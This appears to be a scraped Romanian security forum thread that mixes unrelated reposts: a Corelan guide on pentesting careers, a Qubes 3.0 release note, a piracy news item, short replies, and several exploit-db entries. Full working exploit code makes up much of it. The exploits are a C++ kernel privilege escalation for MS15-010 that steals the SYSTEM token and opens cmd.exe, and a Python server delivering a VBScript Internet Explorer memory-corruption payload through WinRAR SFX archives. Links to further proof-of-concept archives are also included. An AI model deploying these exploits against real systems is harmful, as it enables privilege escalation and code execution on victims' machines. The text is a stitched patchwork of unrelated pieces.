languages (mostly for performance reasons). In any case, understanding what a tool does is more important than writing your own. Writing your own can be useful, because it proves that you understand what needs to be done. This is probably a good time to start using a so-called “penetration distro”, a pre-configured system that contains a large series of security assessment tools. Trying to create your own system from scratch can be helpful, it’s also time consuming and probably not necessary until you fully master the ones that already exist. Kali Linux is one of the most commonly used/popular distributions. It has a large userbase and is well supported by most tool developers. In addition to the more attacker-oriented tools, it’s also a good idea to expand your lab environment and include local and online systems that are designed to be vulnerable, allowing to test your knowledge, using the tools available. If you’re into web application security, a good place to start is https://www.pentesterlab.com/exercises or http://www.amanhardikar.com/mindmaps/PracticeUrls.html. You’ll find more links on the websites listed below. 4. Dive deeper Only when you’re ready, pick the target or targets you want, and create a realistic action plan to achieve the goal. Some topics will take days, others will take weeks, months, maybe years to understand. Take your time, one step at a time. For each type of target, you’ll find specific resources (books, online publications, classes, virtual labs, etc). Some good resources include the websites listed here: https://code.google.com/p/pentest-bookmarks/wiki/BookmarksList http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html http://wiki.securityweekly.com/wiki/index.php/Penetration_Testing_Tips_&_Tricks https://github.com/enaqx/awesome-pentest https://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents http://www.dfir.org/?q=node/8 https://www.owasp.org/index.php/The_OWASP_Testing_Framework http://www.pentest-standard.org (Don’t forget to ask questions as you work your way through resources & materials.) Although I encourage everyone to find their own area of expertise, if you are serious about becoming a professional pentester, you will have to learn a thing or two about web application security. After all, a lot of companies use web application services to serve applications to their employees, customers, partners, suppliers, etc. Since web applications need to be exposed to the outside world in a lot of cases, they are also an important target (and a way in for criminals). Understanding how HTTP works, how web applications are developed, secured, and how underlying database platforms work, will make up a big part of the journey. Your mission, if you choose to accept it, is to find the dependencies and prerequisites that are required to dive deeper into the area you would like to focus on, and to translate those into an action plan. Again, simply ask questions whenever needed. 5. Listen, engage, help Use social media to follow influencers, people that have inspired others, and just more experienced people in general. Engage with people, be nice. Ask questions and help as you learn. If you have the opportunity to attend Infosec conferences/seminars: please do so. It’s a great way to meet more experienced people and talk with them. Ask them what they are working on. Share what you are doing and ask for tips. Ask them who they look up to, or were inspired by and check them out too. Become part of the community. (Oh btw – conferences are great places to find a new job too) Open a website/blog, share your findings. Sure, you may not be the first person to go a particular road… but you won’t be the last either. Environments & technology change, so as you apply your newly acquired knowledge, try to keep track of your progress & document how it applies to latest technology. In fact, you’ll probably end up taking notes as you learn anyway. You might as well structure them and put them online for others to see. Potential employers may not be so interested in *what* you post, but rather focus on how you structure your notes, your thoughts, and your potential innovative approach to things. Make your work visible and teach it to others. Don’t be afraid to make mistakes. You’ll get there. All it needs is time and efforts. Good luck. 6. Don’t be stupid Unless you’re attacking your own system, or you have obtained proper permission to do so, attacking a system (on a network, locally, physically, etc) is a crime. Don’t be stupid. What’s next? What to consider when trying to get a job as pentester In all honesty, it may not be so easy to break into information security and get a job as a pentester. In fact, it’s pretty hard to get into that area professionally (unless you have a desire and business plan that justifies becoming self employed). In general, companies tend to prefer hiring experienced pentesters. After all, most companies want to get “return on investment” as fast as possible, which means they don’t really want to invest too much time in training you and becoming more experienced first before they can rely on you to take on assignments. Not all is lost though. Some companies may offer (summer) internships or may give junior profiles a break… but nothing beats experience. Agreed, it sounds like a catch22 situation. I guess the key is to find a way to gain more “experience”, or “credible ability”. You can gain experience by playing CTFs, by testing your skills in simulated environments and/or get certified. Becoming an “Offensive Security” certified penetration tester or passing SANS exams can be a good investment, as it is well regarded in the industry… and there are certainly other similar “titles” you can earn while you’re at it. I agree, proven experience/knowledge is more important than a title (and some titles don’t even guarantee knowledge), but unfortunately you may not be able to get a seat at the job interview table without a title in the first place. So, to encourage companies to speak up, I decided to tweet this: so… if you’re reading this post and you work at a company that is willing to hire (relatively) inexperienced pentesters (at least, without a lot of professional experience), please let me know (i.e. get me a formal statement, a link to your website that contains more information) and I’ll add the link to this post. If you have a (summer) internship program, please let me know too. Any help is much appreciated. In fact, I strongly believe that companies tend to underestimate the true power of having a junior profile in the team. Benefits include a fresh view on challenges (fresh = less impacted by routine), pushing everyone to stretch their comfort zones. Everybody wins. So far, the following people/companies responded & allowed me to post a link here (or tweeted their policy on the matter): KPN // the Netherlands ERNW // Germany (internships) : ernw.de / info@ernw.de Kyos // Switzerland (internships) NetXP // Paris, France (junior/interns) : netxp.fr / recrutement@netxp.fr Milton Security // USA (junior positions for recent Veterans, internships) NCC Group // USA (junior positions) Nettitude // UK & USA (interns) Attifyme (Remote security internships on Mobile & IoT) Solucom // Paris, France (juniors/interns) : solucom.net/careers SalesForce // US (summer internships for BS/MS students) : http://salesforce.careermount.com/candidate/job_search/advanced/results/1?sort_dir=desc&industry=5571&sort_field=post_date iSIGHT Partners //US (interns) MWRLabs //various locations (juniors/interns) SakurityNetwork // Russia (Juniors) : http://sakurity.com/jobs IOActive // various locations (Juniors/Interns) : careers@ioactive.com ISE (interns) : https://twitter.com/lisa_a_green EdgeScan // Ireland LinkedIn Internships YearUp Securify // the Netherlands (Juniors) : https://www.securify.nl/jobs NetSPI Toreon // Belgium : https://www.toreon.com/category/news/ – https://twitter.com/toreon_BE Facebook (Internships) Facebook University (FBU) (Check out the twitter thread, there may be some other companies that haven’t agreed on posting a link yet, or just don’t want me to post a link here). Warning: Before getting too excited & sending messages to all of the above, think about it for a moment. These companies won’t have unlimited seats. They’re not looking forward to processing millions of applications either. Be creative. What will you do to make sure your profile will get the attention it deserves? What added value will you bring to the company? Put in some efforts, make sure your message stands out amongst the others. Also, please keep in mind that the offers may be limited in time and number of people. On the other hand, there may be other companies out there that might want to give you a break. Use social media, use your network. Don’t give up. Finally, don’t contact me to help you find a job. I am not a recruiter, and don’t want to become a middle man either. I’d like to encourage companies to speak up and for you to take some initiatives too. You can do this. Be smart. What to expect as part of your life as a pentester Well… I don’t know, I’m not a pentester … but I wouldn’t expect to be able to hide in a basement for years. Depending on your geographical location and your customer base, you’ll probably end up having to travel to clients, have meetings (remote, on location), write reports, articulate technical findings into actionable information, present findings, work with clients to fix issues … Exciting times ahead ! Reddit Reddit has some threads related with infosec and hiring: https://www.reddit.com/r/netsec (Infosec related topics) https://www.reddit.com/r/netsec/comments/3n5qne/rnetsecs_q4_2015_information_security_hiring (quarterly hiring thread, link changes every quarter). Some companies will hire junior profiles from that thread. Outro I am certainly not the only person who would like to share a view on getting a job in infosec. In fact, hacks4pancakes posted an article which pretty much deals with the same topic (but maybe presents a different/new angle): http://tisiphone.net/2015/10/12/starting-an-infosec-career-the-megamix-chapters-1-3/ Go check it out, I believe our posts complement each other well. © 2015, Corelan Team (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2015/10/13/how-to-become-a-pentester/

[h=1]Microsoft Windows - Local Privilege Escalation (MS15-010)[/h] // ex.cpp/* Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP CVE-2015-0003 March 2015 (Public Release: May 24, 2015) Tested on: x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 x64: Win 2k8 SP1 | Win 2k8 R2 SP1 Author: Skylake - skylake <at> mail <dot> com */ #include "ex.h" _ZwAllocateVirtualMemory ZwAllocateVirtualMemory; _PsLookupProcessByProcessId PsLookupProcessByProcessId; _PsReferencePrimaryToken PsReferencePrimaryToken; DWORD Pid; ATOM atom; BOOL KrnlMode, bSpawned; DWORD_PTR WINAPI pti() { #ifdef _M_X64 LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); #else LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); #endif } BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) { DWORD_PTR dwIndex, dwMask; #ifdef _M_X64 dwMask = ~0xf; #else dwMask = ~7; #endif // dwCurrentValue &= dwMask; for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) { if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) { // pdwStructure[dwIndex] = dwNewValue; return TRUE; } } return FALSE; } BOOL WINAPI Init() { HMODULE hMod = NULL; PVOID Base = NULL; OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; PSYSTEM_MODULE_INFORMATION pm = NULL; BOOL RetVal = FALSE; __try { if( !GetVersionEx( &ov ) ) __leave; if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) { atom = 0xc039; } else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) { atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a; } if( !atom ) __leave; _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); if( !ZwQuerySystemInformation ) __leave; ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); if( !ZwAllocateVirtualMemory ) __leave; ULONG len; LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); if( !status ) __leave; pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); if( !pm ) __leave; status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); if( status ) __leave; CHAR szKrnl[MAX_PATH] = { 0 }, *t; for( ULONG i = 0; i < pm->Count; ++i ) { if( strstr( pm->Module[i].ImageName, "exe" ) ) { t = strstr( pm->Module[i].ImageName, "nt" ); if( t ) { strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); Base = pm->Module[i].Base; break; } } } hMod = LoadLibraryA( szKrnl ); if( !hMod || !Base ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); if( !PsLookupProcessByProcessId ) __leave; PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); if( !PsReferencePrimaryToken ) __leave; PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); Pid = GetCurrentProcessId(); RetVal = TRUE; } __finally { if( pm ) LocalFree( pm ); if( hMod ) FreeLibrary( hMod ); } return RetVal; } LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) { LPVOID pCurProcess = NULL; LPVOID pSystemInfo = NULL; PACCESS_TOKEN systemToken; PACCESS_TOKEN targetToken; PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); targetToken = PsReferencePrimaryToken( pCurProcess ); systemToken = PsReferencePrimaryToken( pSystemInfo ); // find_and_replace_member( ( PDWORD_PTR ) pCurProcess, ( DWORD_PTR ) targetToken, ( DWORD_PTR ) systemToken, 0x200 ); KrnlMode = TRUE; return 0; } VOID WINAPI leave() { keybd_event( VK_ESCAPE, 0, 0, NULL ); keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); } LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) { if( bSpawned ) { leave(); ExitProcess( 0 ); } switch( message ) { case WM_CREATE: SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); FlashWindow( hWnd, TRUE ); keybd_event( VK_LWIN, 0, 0, NULL ); break; case WM_CLOSE: DestroyWindow( hWnd ); break; case WM_DESTROY: PostQuitMessage( 0 ); break; case WM_TIMER: KillTimer( hWnd, ID_TIMER ); leave(); DestroyWindow( hWnd ); break; default: return DefWindowProc( hWnd, message, wParam, lParam ); } return 0; } int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPTSTR lpCmdLine, _In_ int nCmdShow ) { WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; HWND hWnd = NULL; MSG Msg = { 0 }; SIZE_T size = 0x1000; LPVOID addr = ( LPVOID ) 1; if( !Init() ) return 1; if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) { // return 1; } DWORD_PTR p = pti(); if( !p ) return 1; #ifdef _M_X64 *( ( PDWORD_PTR ) 0x10 ) = p; *( ( LPBYTE ) 0x2a ) = 4; *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; *( ( PDWORD_PTR ) 0xa8 ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( PDWORD_PTR ) 0x408 ) = 0x800; *( ( LPWORD ) 0x410 ) = atom; *( ( LPBYTE ) 0x412 ) = 1; #else *( ( LPDWORD ) 0x08 ) = p; *( ( LPBYTE ) 0x16 ) = 4; *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; *( ( LPDWORD ) 0x6c ) = 0x400; *( ( LPDWORD ) 0x404 ) = 1; *( ( LPDWORD ) 0x408 ) = 0x800; *( ( LPWORD ) 0x40c ) = atom; *( ( LPBYTE ) 0x40e ) = 1; #endif wc.lpfnWndProc = WndProc; wc.hInstance = hInstance; wc.lpszClassName = TEXT( "Class" ); if( !RegisterClassEx( &wc ) ) return 1; hWnd = CreateWindowEx( WS_EX_CLIENTEDGE, TEXT( "Class" ), TEXT( "Window" ), WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, NULL, NULL, hInstance, NULL ); if( !hWnd ) return 1; ShowWindow( hWnd, SW_HIDE ); UpdateWindow( hWnd ); while( GetMessage( &Msg, NULL, 0, 0 ) ) { if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 { if( !KrnlMode ) { Msg.hwnd = ( HWND ) NULL; } else { Msg.hwnd = hWnd; if( !bSpawned ) { ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); bSpawned = TRUE; } } } TranslateMessage( &Msg ); DispatchMessage( &Msg ); } return ( int ) Msg.wParam; } // EOF //ex.h #pragma once #include <windows.h> #include <stdio.h> #include <tchar.h> typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect ); typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( _In_ HANDLE ProcessId, _Out_ PVOID *Process ); typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( _Inout_ PVOID Process ); typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation = 0, SystemModuleInformation = 11 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { HANDLE Section; PVOID MappedBase; PVOID Base; ULONG Size; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; #define ID_TIMER 0x1 #define WM_SYSTIMER 0x118 // EOF Sursa: https://www.exploit-db.com/exploits/37098/

Nici ASM, Java, Python, Perl, LISP, PHP sau cele esoterice nu sunt limbaje de programare. int main() { /* shellcode care afiseaza mesajul /* return 0; }

HTML: "Hello, world."

Noua perchezitii in Bucuresti la persoane ce ar fi retransmis fara drept programe de televiziune. Prejudiciul este estimat la 1,5 mil. euro de G.S. HotNews.ro Luni, 12 octombrie 2015, 8:50 Actualitate | Esen?ial Politia Romana efectueaza, luni dimineata noua perchezitii pe raza municipiului Bucuresti, la locuintele unor persoane banuite ca ar fi creat un prejudiciu de aproximativ 1.500.000 de euro prin punerea la dispozitia publicului de opere protejate (programe de televiziune) si de utilizare a unor marci inregistrate fara consimtamantul titularilor si spalare de bani, informeaza Inspectoratul General. Politistii Directiei de Investigare a Criminalitatii Economice din IGPR si procurorii Parchetului General efectueaza perchezitii la locuintele a patru persoane si la sediile unor societatii controlate de acestea. Din cercetari a reiesit ca, in perioada 2013-2015, cei in cauza ar fi creat mai multe pagini de internet, prin intermediul carora ar fi pus la dispozitia publicului si ar fi retransmis, contra cost, programe ale unor posturi de televiziune cu acces restrictionat, fara a avea acordul acestora, incalcand astfel prevederile in materia drepturilor de autor. Pentru a comercializa dispozitivele speciale de receptie a acestor programe si pentru a incasa sume de bani de la abonati, acestia ar fi infiintat numeroase societati atat in Romania cat si in alte state (inclusiv societati de tip off-shore infiintate in Cipru si SUA-Delaware). Cu ajutorul societatilor infiintate, ar fi disimulat tranzactiile efectuate si ar fi ascuns veniturile obtinute din aceste activitati ilicite, mare parte din sumele obtinute in acest mod fiind reinvestite. Prejudiciul cauzat prin activitatea infractionala, estimat pana in prezent, este de aproximativ 1.500.000 de euro. Sursa: Noua perchezitii in Bucuresti la persoane ce ar fi retransmis fara drept programe de televiziune. Prejudiciul este estimat la 1,5 mil. euro - Esential - HotNews.ro

Din cate stiu eu: The CryptProtectData function performs encryption on the data in a DATA_BLOB structure. Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer. For information about exceptions, see Remarks.

Se poate vedea live, acum.

Thanks. Nu mai merge pe Chrome, insa l-am fixat, dar nu e pus pe GitHub. O sa ii fac update, am mai lucrat la el, dar trebuie sa imi pun o licenta ceva, sa nu am probleme daca il folosesc altii in mod "urat".

Mai e putin.

Probabil foloseste un fuzzer, insa nu le-a descoperit pe toate in 2 zile. Sunt descoperite de-a lungul unei perioade mari, de exemplu un an. Pe exploit-db le-a dat (el sau altcineva) submit la gramada in acea perioada, de aceea apar atunci. Probabil pe issue-urile de pe Project Zero apar mai concret niste date.

Nu cred ca Nils e genul de om care sa cumpere asa ceva. Dar cred ca e genul de om care sa gaseasca asa ceva.

Qubes 3.0 Oct 1, 2015 • Joanna Rutkowska About 5 months after the initial release of Qubes 3.0-rc1, we're now releasing the final 3.0 today! Let me quickly recap the main "killer features" of Qubes OS 3.0 compared to the Release 2: Qubes is now based on what we call Hypervisor Abstraction Layer (HAL), which decouples Qubes logic from the underlying hypervisor. This will allow us to easily switch the underlying hypervisors in the near future, perhaps even during the installation time, depending on the user needs (think tradeoffs between hardware compatibility and performance vs. security properties desired, such as e.g. reduction of covert channels between VMs, which might be of importance to some users). More philosophically-wise, this is a nice manifestation of how Qubes OS is really "not yet another virtualization system", but rather: a user of a virtualization system (such as Xen). We upgraded from Xen 4.1 to Xen 4.4 (now that was really easy thanks to HAL), which allowed for: 1) better hardware compatibility (e.g. UEFI coming soon in 3.1), 2) better performance (e.g. via Xen's libvchan that replaced our vchan). Also, new Qubes qrexec framework that has optimized performance for inter-VM services. We introduced officially supported Debian templates. And finally: we integrated Whonix templates, which optimize Tor workflows for Qubes. As explained in our Release Cycle Documentation (something we finally created and been polishing through this 3.0 branch development), there is almost no new features in 3.0 compared to 3.0-rc1, essentially only bugfixes, intermixed with a few minor improvements. But, while the 3.0 branch was "maturing", and getting bugfixes merged, most of our work has been focused on the 3.1 branch, which is adding a bunch of exciting new features, as indicated on our high-level roadmap, specifically: UEFI support (see this ticket for more info and test images). Live USB edition (preview for which we already released earlier this summer, now it will get merged into the master branch for 3.1) Management/pre-configuration stack: The Big Killer Feature of the upcoming 3.1 release, which will make it easy to provide out of the box configurations for things such as: out of the box Whonix/Tor, or Split GPG, or default USB sandboxing VM, which currently the user must do manually. We're planning to release the first candidate for 3.1 as early as the end of October, actually. But development of any serious project is not just adding new features, although that's admittedly the most exciting thing for any developer to do. In R3 we have finally started implementing this golden thought, and the first tangible outcome of this change of attitude is the automated testing framework which we have been using for all the releases in this 3.0 branch already. We hope this results in much more polished, stable code. Other things we've started to be increasingly prioritizing recently, and only plan to intensify in the coming year are: 1) making Qubes more accessible to people (think easier to get hardware that can run Qubes OS), and 2) easier to use (better UX and UI). I think this is also pretty exciting, actually. As previously announced earlier this summer, we have decided to dedicate this release of Qubes OS to the memory of Caspar Bowden: Caspar has been a proud user, supporter, and advocate for Qubes OS, and also a friend. I think he would have liked that dedication. The Qubes 3.0 ISO can be downloaded from here. We have also released another scheduled Qubes Canary today. I would like to thank all the people who have contributed to this huge effort of creating a new "reasonably secure" desktop OS. I believe we're making together an important and meaningful thing here. Let's keep this going! Sursa: http://blog.invisiblethings.org/2015/10/01/qubes-30.html

[h=1]Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)[/h] Source: https://code.google.com/p/google-security-research/issues/detail?id=474 --- The attached PoC triggers a buffer overflow in the NtGdiBitBlt? system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys --- Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip Sursa: https://www.exploit-db.com/exploits/38307/

[h=1]Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability[/h] # Title: Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability # Date: 09/28/2015 # Author: Reigning Shells, based off PoC published by Zero Day Initiative # Vendor Homepage: adobe.com # Version: Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable. # Tested on: Adobe Acrobat 11.0.10 on Windows 7 # CVE : CVE-2015-3073 This vulnerability allows remote attackers to bypass API restrictions on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within AFParseDate. By creating a specially crafted PDF with specific JavaScript instructions, it is possible to bypass the Javascript API restrictions. A remote attacker could exploit this vulnerability to execute arbitrary code. Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X are vulnerable. Notes: The code assumes you attached a DLL named exploit.txt to the PDF document to get around attachment security restrictions. Acrobat will execute updaternotifications.dll if it's in the same directory as the Acrobat executable or the same directory as the document being opened. Credit for discovery and the initial POC that illustrates code being executed in the privileged context (launching a URL) goes to the Zero Day Initiative. Code: https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38344.zip Sursa: https://www.exploit-db.com/exploits/38344/

[h=1]WinRar 5.21 - SFX OLE Command Execution[/h] #!/usr/bin/python -w # Title : WinRar SFX OLE Command Execution # Date : 25/09/2015 # Author : R-73eN # Tested on : Windows Xp SP3 with WinRAR 5.21 # # Triggering the Vulnerability # Run this python script # Right click a file and then click on add to archive. # check the 'Create SFX archive' box # go to Advanced tab # go to SFX options # go to Text And icon # copy the code that the script will generate to 'Text to display into sfx windows' # Click OK two times and the sfx archive is generated. # If someone opens that sfx archive a calculator should pop up. # # Video : https://youtu.be/vIslLJYvnaM # banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner import socket CRLF = "\r\n" #OLE command execution exploit = """<html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "calc.exe", "runas", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=rum(i+8) i=rum(i+16) j=rum(i+&h134) for k=0 to &h60 step 4 j=rum(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=rum(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function rum(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 rum=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html>""" response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) host = raw_input(" Enter Local IP: ") server_address = (host, 8080) sock.bind(server_address) print "[+] Server started " + host + " [+]" sock.listen(1) print "[+] Insert this code on the 'Text to display into sfx windows' [+]" print "\n<iframe src='http://" + host + ":8080/'> </iframe>" print "\n[+] Waiting for request . . . [+]" connection, client_address = sock.accept() while True: connection.recv(2048) print "[+] Got request , sending exploit . . .[+]" connection.send(exploit) print "[+] Exploit sent , A calc should pop up . . [+]" print "\nhttps://www.infogen.al/\n" exit(0) Sursa: https://www.exploit-db.com/exploits/38319/